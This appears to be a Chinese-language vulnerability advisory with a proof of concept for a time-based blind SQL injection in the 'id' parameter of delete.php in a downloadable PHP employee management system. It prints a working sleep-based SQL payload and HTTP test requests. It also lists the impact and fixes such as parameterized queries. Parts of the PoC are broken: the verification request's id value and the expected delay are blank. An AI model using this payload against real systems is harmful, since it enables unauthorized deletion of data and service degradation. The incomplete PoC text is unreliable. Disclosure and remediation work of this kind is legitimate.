# EMPLOYEE_MANAGEMENT_SYSTEM 370project/delete.php SQL注入漏洞 ## 漏洞概述 - **漏洞类型**:SQL注入(基于时间的盲注) - **漏洞文件**:`370project/delete.php` - **漏洞参数**:`id` 参数直接从URL获取并拼接到DELETE语句中,未进行参数化处理。 ## 影响范围 - 操纵数据库查询(未经授权的数据修改/删除,取决于数据库权限) - 通过盲注技术推断数据库行为/数据 - 通过强制昂贵的延时数据库操作降低可用性 ## 利用代码(Payload) ```sql (select*from(select(sleep(10))union/**/select(1))a) (select*from(select(sleep(10))union/**/select(1))a) ``` ## POC验证 **正常请求(基线):** ```http GET /delete.php?id=101 HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **延时验证请求(需URL编码):** ```http GET /delete.php?id= HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **预期结果**:验证请求比基线请求响应慢约 `` 秒,表明注入了恶意输入。 ## 修复方案 - 使用参数化查询(预编译语句)替代字符串拼接 - 对输入参数进行严格验证和过滤 - 使用ORM框架或数据库抽象层 ## 源码下载 https://code-projects.org/employee-management-system-in-php-with-source-code/